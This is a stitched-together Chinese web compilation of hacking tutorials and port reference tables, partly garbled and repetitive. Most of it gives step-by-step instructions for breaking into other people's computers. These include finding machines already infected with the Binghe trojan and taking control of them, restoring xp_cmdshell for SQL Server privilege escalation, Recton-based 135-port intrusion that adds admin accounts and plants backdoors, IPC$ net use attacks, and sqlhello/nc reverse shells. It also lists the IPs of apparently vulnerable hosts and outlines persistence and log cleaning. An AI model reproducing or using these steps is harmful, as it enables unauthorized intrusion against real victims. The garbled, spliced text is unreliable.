第一步 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。 下载完毕并解压缩之后跟我进行第二步! 第二步 运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。 第三步 在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。 第四步 进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选 “结束地址”栏填XXX.XXX.255.255其中XXX.XXX 择了,比如你可以选61.128或选61.200等等, 的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。 好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。 第五步 观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II 扫描网上开放某一端口的计算机了。 下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。 第六步 点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。 第七步 在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。 好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。 第八步 这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。 第九步 点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!! 第十步 你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:

利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器 利用1433端口提权 相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net 没权限情况的提权方法; 1、未找到储存过程!那就来修复下吧! 用到SQL语句: xp_cmdshell新的恢复办法 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 图1

2、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图2

3、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL 找到了哈哈! 图3

4、恢复! 用到SQL语句: 第一 exec sp_dropextendedproc 'xp_cmdshell' 第二 dbcc addextendedproc ("xp_cmdshell","d:\应用软件 \SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL") 恢复好了

计算机端口详解与常见端口入侵方法

计算机“端口”是英文port的义译,可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口,如:USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。 可以先了解面向连接和无连接协议(Connection-Oriented and Connectionless Protocols) 面向连接服务的主要特点有:面向连接服务要经过三个阶段:数据传数前,先建立连接,连接建立后再传输数据,数据传送完后,释放连接。面向连接服务,可确保数据传送的次序和传输的可靠性https://www.sodocs.net/doc/7111627801.html,无连接服务的特点是:无连接服务只有传输数据阶段。消除了除数据通信外的其它开销。只要发送实体是活跃的,无须接收实体也是活跃的。它的优点是灵活方便、迅速,特别适合于传送少量零星的报文,但无连接服务不能防止报文的丢失、重复或失序。 区分“面向连接服务”和“无连接服务”的概念,特别简单、形象的例子是:打电话和写信。两个人如果要通电话,必须先建立连接——拨号,等待应答后才能相互传递信息,最后还要释放连接——挂电话。写信就没有那么复杂了,地址姓名填好以后直接往邮筒一扔,收信人就能收到。TCP/IP协议在网络层是无连接的(数据包只管往网上发,如何传输和到达以及是否到达由网络设备来管理)。而“端口”,是传输层的内容,是面向连接的。协议里面低于1024的端口都有确切的定义,它们对应着因特网上常见的一些服务。这些常见的服务可以划分为使用TCP端口(面向连接如打电话)和使用UDP端口(无连接如写信)两种。 网络中可以被命名和寻址的通信端口是操作系统的一种可分配资源。由网络OSI(开放系统互联参考模型,Open System Interconnection Reference Model)七层协议可知,传输层与网络层最大的区别是传输层提供进程通信能力,网络通信的最终地址不仅包括主机地址,还包括可描述进程的某种标识。所以TCP/IP协议提出的协议端口,可以认为是网络通信进程的一种标识符https://www.sodocs.net/doc/7111627801.html, 应用程序(调入内存运行后一般称为:进程)通过系统调用与某端口建立连接(binding,绑定)后,传输层传给该端口的数据都被相应的进程所接收,相应进程发给传输层的数据都从该端口输出。在TCP/IP协议的实现中,端口操作类似于一般的I/O操作,进程获取一个端口,相当于获取本地唯一的I/O文件,可以用一般的读写方式访问https://www.sodocs.net/doc/7111627801.html, 类似于文件描述符,每个端口都拥有一个叫端口号的整数描述符,用来区别不同的端口。由于TCP/IP传输层的TCP和UDP两个协议是两个完全独立的软件模块,因此各自的端口号也相互独立。如TCP有一个255号端口,UDP也可以有一个255号端口,两者并不冲突https://www.sodocs.net/doc/7111627801.html, 端口号有两种基本分配方式:第一种叫全局分配这是一种集中分配方式,由一个公认权威的中央机构根据用户需要进行统一分配,并将结果公布于众,第二种是本地分配,又称动态连接,即进程需要访问传输层服务时,向本地操作系统提出申请,操作系统返回本地唯一的端口号,进程再通过合适的系统调用,将自己和该端口连接起来(binding,绑定)。TCP/IP 端口号的分配综合了以上两种方式,将端口号分为两部分,少量的作为保留端口,以全局方式分配给服务进程。每一个标准服务器都拥有一个全局公认的端口叫周知口,即使在不同的机器上,其端口号也相同。剩余的为自由端口,以本地方式进行分配。TCP和UDP规定,小于256的端口才能作为保留端口。 按端口号可分为3大类: (1)公认端口(Well Known Ports):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。(2)注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也

常用的端口入侵

21端口: 21端口是默认的FTP端口,利用方式:弱口令探测/溢出 目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个漏洞。 22端口 22端口是SSH远程登录协议,利用方式:弱口令探测 23端口 23端口是TLENET的默认端口,利用方式:弱口令探测/溢出 一般大家用弱口令探测得比较多,但是成功率比较低,还是溢出来得快,毕竟权限高,想做什么都可以! 25端口 25端口是SMTP协议的默认端口,邮件接收服务器。利用方式:溢出 53端口 53端口是DNS服务的默认端口,提供域名服务器, 利用方式:溢出。这个今年很火,我试了一下,一晚上差不多可以溢出10W台开几抬肉鸡的话 79端口 79端口Finger服务的默认端口(查询远程主机在线用户等信息),可以在辅助入侵中获取更多的主机信息。利用FINGER服务可以查询到主机很多敏感的信息,在入侵的时候常常可以起到意想不到的作用。

80端口 80端口是IIS的默认端口,全球信息网超文本传输协议(www)。利用方式:IIS溢出/SQL注入/旁注/跨站。不过一部分路由器的远程管理端口也是80。SQL注入大家已经很熟悉了吧,IIS溢出也只存在那些很老的机器上,看运气了。 110端口 110端口提供 Pop3 服务。邮件发送服务器。利用方式:溢出。 135端口 135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。 网上教程非常多,不多说了。 137端口 137端口统共NetBIOS 数据报(UDP)服务。 139端口 139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。 161端口 161端口是远程管理设备(SNMP)的默认端口。这个很多小菜不知道怎么利用,那么重点来说说这个。 SNMP是简单网络管理协议,不清楚百度一下,很多小菜扫描出来了SNMP的弱口令,比如private,public等等,但是不知道怎么利用,这里介绍两款工具:IP NetWork browse 和LANguard NetWork Scnaner,这两个工具都可以扫描SNMP,而且可以扫描到,磁盘,服务,

常用入侵端口

常用入侵端口.txt为什么我们在讲故事的时候总要加上从前?开了一夏的花,终落得粉身碎骨,却还笑着说意义。端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux 在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS 攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。 端口:21 服务:FTP 说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous 的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。 端口:22 服务:Ssh 说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。 端口:23 服务:Telnet 说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server 就开放这个端口。 端口:25 服务:SMTP

135端口入侵的方法(简单)

135端口入侵的方法(简单) (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。 (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。 (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM 权限。 下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的

黑客常用的几种入侵端口的方法

【托管服务qin】黑客常用的几种入侵端口的方法 服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC 工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入 侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。" ^' D( E3 K! N) ^! c 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键)7 L5 a9 T" E: C& x' k* C 最后SQLTools.exe入侵4 r+ F" q g9 j- K9 m* x4 o' E =============================2 z0 ~3 T) K5 n8 W; Z 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功)) Q) Q7 K+ L! J$ o6 Z9 w( a sqlhelloz.exe 入侵ip 1433 (这个是正向连接)% J3 L6 x8 y: t; p 2. 4899端口入侵9 `" f0 r# k2 ^: F 用4899过滤器。exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe)* X8 }: O! |2 }& x7 M 4. 80入侵+ J9 [0 L4 _) B! K 对sp3以前的机器,可以用webdav入侵;

3389端口介绍

端口介绍: 3389端口是Windows 2000(2003) Server 远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,因此远程服务器一般都将这个端口修改数值或者关闭。 3389端口的关闭: 首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须的,建议关闭该服务。 win2000 server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。 win2000 pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。 windows xp关闭的方法:在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。 通过注册表关闭3389端口 开始---运行 输入regedit打开注册表 [HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminalser ver\wds\rdpwd\tds\tcp分支,选中名为portnumber的键值,将其3389改为其他(如1234)看我操作这里control有2个分别为controlSET001 和controlSET002我一个一个来先进controlSET001在来controlSET002 下面我们在看currentcontrolset [HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminalser ver\winstations\RDP-Tcp\PortNumber分支里应该有一个或者很多类似的子键,一样的改他的值3389为其他(如1234) 将远程桌面端口修改成其他端口号 修改服务器端的端口设置,注册表有2个地方需要修改。 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] PortNumber值,默认是3389,修改成所希望的端口,就如你所说该成6222。第二个地方: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

常见端口对照表

常见端口对照表 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP 连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP 的数据包,受害者为了回应这些数据而过载。 端口:21 服务:FTP 说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP 服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash 和Blade Runner所开放的端口。 端口:22 服务:Ssh 说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。 端口:23 服务:Telnet 说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。 端口:25 服务:SMTP

139端口入侵简易教程

139端口入侵简易教程; net use \\192.168.0.1\ipc$ "" /user:administrator 提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。 首先,连接的命令是: net<空格>use<空格>\\IP地址\ipc$<空格>密码<空格>/user:用户名 假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的: net use \\192.168.1.11\ipc$ 123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"! 空密码是这样的: 如果密码是空的,那就在原先输入密码的地方以""代替。 开始查看权限: 查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的: copy<>文件绝对路径<>\\IP地址\文件目标路径 比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下: copy c:\a.exe \\192.168.1.11\d$ 要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。如果命令执行成功,系统同样会提示"已复制1 个文件" 小技巧: 再次复制相同文件至相同路径,以检测是否存在杀毒软件!!! 如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。如果没有提示,则说明安装了杀毒软件。

电脑常用端口端口大全

电脑常用端口端口大全 一、端口大全 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX 等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER 利用IP欺骗可以发动dos攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle dos攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。 端口:21 服务:ftp 说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的ftp服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible ftp、webEx、WinCrash和Blade Runner所开放的端口。 端口:22 服务:Ssh 说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。 端口:23 服务:TelNET 说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny TelNET Server就开放这个端口。 端口:25 服务:SMTP 说明:SMTP服务器所开放的端口,用于发送邮件。入侵者寻找SMTP服务器是为

入侵思路-攻击篇-常见WEB攻击

第一部分常见WEB攻击 一.按传统攻击分类,大概有以下几阶段 1.漏洞探察,端口探测 2.攻击外部入口 3.架设连接内部网络的程序 4.攻击内部网络 5.攻击内部主机或网络,建立外连通道 6.扩大内部网络攻击渗透的范围,下载传输内部网络的资料 7.固定内部网络的战果,建立长期入侵通道 8.清理入口,内部网络留下的工作日志 9.尽量是内部网络和外部入口设备和机器保持网络管理员看起来的正常,减少网络传输的频率,保证能长期占领该网络 二.下面就直接讲入侵的传统手法 1.常见的就是扫描该网络的出口,找到映射出来的端口 2.弱口令猜解,溢出,WEB渗透的办法,另外还有一些网络欺骗的手段,最后就是社会工程的方法搞定外部入口 3.现在网络基本上的外部入口不会有特别的端口,常见协议有FTP,SSH,POP3,SMTP,WEB,telnetd,还有某些协议代理的端口,所以基本可用的方法首先就是溢出,大家可以去看看0DAY,实在没有就去找找发布过的1DAY,但是一般的没有太大的成功几率.

我这里谈的攻击,主要谈谈通过WEB的渗透办法 三.传统的WEB漏洞 3.1. 目录浏览 通过浏览地址http://IP/docquery,可以查看到docquery目录下的所有文件的名称 3.2. 备份页面暴源码

管理员为了维护的方便,会在web页面的目录保存页面编辑时候的备份文件,或者是由于某些编辑软件自动生成bak为扩展名的页面文件,导致在浏览器直接可以查看页面文件源代码 3.3. 默认管理页面漏洞 比如

安装的是tomcat,存在默认管理页面http://IP/admin/index.jsp,并且没有更改默认的登陆帐号的密码,使用默认的账号密码可以登录。通过上传木马可以轻易就获得WEBSHELL,由于tomcat以服务运行,因此直接获得system权限 3.4 SQL 注入 比如,http://IP/Page.jsp?City=天津 该链接存在注入漏洞,参数city附近语法不严格导致产生注入点,可以使用数据库猜解工具得到数据库中的数据。 比如, 漏洞测试网站一:云南黑客联盟 申请一个用户,登陆,然后发表文章,D:YNHACKUSER../inc/cls_main.asp网站路径管理员数小于5,管理

3389端口及一些漏洞主机

202.103.207.208 202.103.207.217 202.103.207.213 202.103.208.247 202.103.209.104 202.103.209.166 202.103.209.178 202.103.209.184 202.103.209.185 202.103.209.175 202.103.209.171 202.103.209.169 202.103.210.36 202.103.210.150 202.103.210.178 202.103.210.184 202.103.210.181 202.103.211.14 202.103.211.103 202.103.211.110 202.103.211.176 202.103.211.189 202.103.211.254 202.103.223.123 202.103.223.241 202.103.223.234 202.103.223.246 202.103.223.245 202.103.223.247 202.103.223.248 202.103.225.74 202.103.225.76 202.103.225.80 202.103.225.82 202.103.225.194 202.103.238.9 202.103.238.16 202.103.238.25 202.103.238.27 202.103.238.22 202.103.238.37 202.103.238.26 202.103.238.28

202.103.238.85 202.103.238.137 202.103.238.130 202.103.238.185 202.103.239.124 202.103.239.125 202.103.239.134 202.103.239.213 202.103.239.153 202.103.239.126 202.103.239.123 202.103.239.146 202.103.240.34 202.103.239.229 202.103.239.234 202.103.240.199 61.139.219.165 61.139.219.186 61.139.219.189 61.139.219.187 61.139.219.240 61.139.247.196 218.65.132.20 218.65.132.21 218.65.171.94 218.65.213.19 218.65.214.186 218.65.226.249 218.65.227.48 218.65.230.151 218.65.230.125 218.65.230.162 218.65.230.139 218.65.230.126 218.65.230.228 218.65.230.230 218.65.230.204 218.65.231.31 218.65.246.228 218.21.64.5 218.21.64.37 218.21.64.57 218.21.64.89

常用端口号大全

常用端口号大全 20和21,究竟哪个是传控制的,哪个是传数据的? ftp-data 20/tcp File Transfer [Default Data] ftp-data 20/udp File Transfer [Default Data] ftp 21/tcp File Transfer [Control] ftp 21/udp File Transfer [Control] FTP就是文件传输协议File Transfer Protocol 的缩写. FTP端口号是21 FTP的端口号能改 ftp的端口号20、21的区别一个是数据端口,一个是控制端口,控制端口一般为21,而数据端口不一定是20,这和FTP的应用模式有关,如果是主动模式,应该为20,如果为被动模式,由服务器端和客户端协商而定 电脑上有多少个端口?我怎么样才能知道自己的电脑哪些端口是开的?那些是关的?哪些是可用的?怎么样才能把打开着的关了,把关着的打开,电脑上有多少个端口。 计算机“端口”是英文port的义译,可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口,如:USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。 按端口号可分为3大类: (1)公认端口(Well Known Ports):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。 (2)注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。 (3)动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。 一些端口常常会被黑客利用,还会被一些木马病毒利用,对计算机系统进行攻击,以下是计算机端口的介绍以及防止被黑客攻击的简要办法。 8080端口 端口说明:8080端口同80端口,是被用于WWW代理服务的,可以实现网页浏览,经常在访问某

防止黑客入侵 网络端口的安全防护技巧

防止黑客入侵网络端口的安全防护技巧大荟萃 众所周知,计算机之间通信是通过端口进行的,例如你访问一个网站时,Windows就会在本机开一个端口(例如1025端口),然后去连接远方网站服务器的一个端口,别人访问你时也是如此。默认状态下,Windows会在你的电脑上打开许多服务端口,黑客常常利用这些端口来实施入侵,因此掌握端口方面的知识,是安全上网必备的技能。 一、常用端口及其分类 电脑在Internet上相互通信需要使用TCP/IP协议,根据TCP/IP协议规定,电脑有256×256(65536)个端口,这些端口可分为TCP端口和UDP端口两种。如果按照端口号划分,它们又可以分为以下两大类: 1. 统保留端口(从0到1023) 这些端口不允许你使用,它们都有确切的定义,对应着因特网上常见的一些服务,每一个打开的此类端口,都代表一个系统服务,例如80端口就代表Web服务。21对应着FTP,25对应着SMTP,110对应着POP3等。 2. 动态端口(从1024到65535) 当你需要与别人通信时,Windows会从1024起,在本机上分配一个动态端口,如果1024端口未关闭,再需要端口时就会分配1025端口供你使用,依此类推。 但是有个别的系统服务会绑定在1024到49151的端口上,例如3389端口(远程终端服务)。从49152到65535这一段端口,通常没有捆绑系统服务,允许Windows动态分配给你使用。 二、如何查看本机开放了哪些端口 在默认状态下,Windows会打开很多“服务端口”,如果你想查看本机打开了哪些端口、有哪些电脑正在与本机连接,可以使用以下两种方法。

相关主题